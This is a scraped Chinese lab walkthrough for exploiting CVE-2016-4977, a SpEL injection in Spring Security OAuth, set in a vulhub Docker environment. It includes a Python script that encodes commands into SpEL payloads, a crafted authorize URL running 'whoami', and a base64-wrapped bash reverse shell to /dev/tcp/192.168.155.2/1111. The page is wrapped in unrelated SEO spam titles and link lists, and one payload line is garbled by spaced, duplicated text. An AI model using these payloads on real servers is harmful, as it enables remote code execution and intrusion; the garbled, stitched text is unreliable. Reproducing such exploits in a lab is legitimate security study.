当前位置: 首页 > news >正文

郑州公交app宝鸡百度seo

news 2025/7/15 0:30:06
郑州公交app,宝鸡百度seo,广告公司经营范围有哪些内容,寺庙建设网站的意义文章目录 一、搭建环境二、漏洞验证三、准备payload四、执行payload五、变形payload 一、搭建环境 cd vulhub/spring/CVE-2016-4977/ docker-compose up -d 二、漏洞验证 访问 http://192.168.10.171:8080/oauth/authorize?response_type${233*233}&client_idacme&s…

文章目录

  • 一、搭建环境
  • 二、漏洞验证
  • 三、准备payload
    • 四、执行payload
    • 五、变形payload

一、搭建环境

cd vulhub/spring/CVE-2016-4977/
docker-compose up -d

在这里插入图片描述在这里插入图片描述

二、漏洞验证

访问
http://192.168.10.171:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test
用admin:admin登陆
在这里插入图片描述

出现以下报错,表示漏洞存在(response_type里面的命令执行了)
在这里插入图片描述

三、准备payload

poc.py
#!/usr/bin/env python
message = input(‘Enter message to encode:’)
poc = ‘${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)’ % ord(message[0])
for ch in message[1:]:
poc += ‘.concat(T(java.lang.Character).toString(%s))’ % ord(ch)
poc += ‘)}’
print(poc)

python3 poc.py #输入要执行的命令,会返回处理后的命令,这里输入whoami
在这里插入图片描述

取出得到的输出
T ( j a v a . l a n g . R u n t i m e ) . g e t R u n t i m e ( ) . e x e c ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 119 ) . c o n c a t ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 104 ) ) . c o n c a t ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 111 ) ) . c o n c a t ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 97 ) ) . c o n c a t ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 109 ) ) . c o n c a t ( T ( j a v a . l a n g . C h a r a c t e r ) . t o S t r i n g ( 105 ) ) ) P a y l o a d : o a u t h / a u t h o r i z e ? r e s p o n s e t y p e = {T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105)))} Payload:oauth/authorize?response_type= T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105)))Payload:oauth/authorize?responsetype={T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105)))}&client_id=acme&scope=openid&redirect_uri=http://test

四、执行payload

在这里插入图片描述

返回了进程,表示代码执行了,但这没有回显,是无回显RCE

五、变形payload

准备shell代码:bash -i >& /dev/tcp/192.168.155.2/1111 0>&1
转成base64:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ==
shell:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ==}|{base64,-d}|{bash,-i}
Python poc.y获取输出
在这里插入图片描述

将上面的命令加入到response_type参数部分,得到变形后的url
六、Getshell
开启监听
在这里插入图片描述

执行变形后的payload得到shell
在这里插入图片描述

http://www.dt0577.cn/news/33141.html

相关文章:

  • 精品网站建设需要多少钱百度站长中心
  • 企业网站建设运营自建站怎么推广
  • 工业网站建设百度竞价推广流程
  • 网站设计运行费用关键词优化公司电话
  • 网站推广的分类现在推广引流什么平台比较火
  • 美橙西安网站备案拍照企业推广是什么职业
  • 怎么做同学录的网站开发一款app软件需要多少钱
  • 视频聚合网站怎么做不侵权美国新冠疫情最新消息
  • b2c网站建设费用如何做到精准客户推广
  • 做设备开通哪个网站好网络seo
  • 赤峰微网站建设在哪里打广告效果最好
  • 新疆建设兵团五师87团网站seo优化网站源码
  • .net asp可以外链其它网站吗百度商家版下载
  • 嘉峪关市建设路小学新闻网站源云推广
  • 苏州做网站外包的公司朋友圈广告投放价格表
  • 做网站什么语言好淄博网站制作
  • 网站项目怎么做计划网上营销怎么做
  • 临清网站建设服务交易平台官网
  • 郑州网站优化平台seo研究中心怎么了
  • wordpress可以装多少会员数据库网络网站推广优化
  • 安徽政府网站建设西安网站建设推广
  • 莱州市做网站的公司找seo外包公司需要注意什么
  • 临沂做网站关键词优化排名首页
  • WordPress禁用代码编辑器杭州seo外包服务
  • wordpress 缩略图百度seo技术
  • 哪些网站可以做商家大连今日新闻头条
  • 开源网站建设实习心得seo推广效果
  • vs做网站案例谷歌浏览器chrome官网
  • 个人网站做百度云电影链接犯法吗软文素材
  • 网站栏目模块app推广引流方法